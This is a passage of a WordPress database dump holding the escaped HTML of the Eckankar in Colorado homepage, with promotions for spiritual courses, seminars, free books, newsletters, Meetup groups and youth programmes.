data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242844,41181,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div 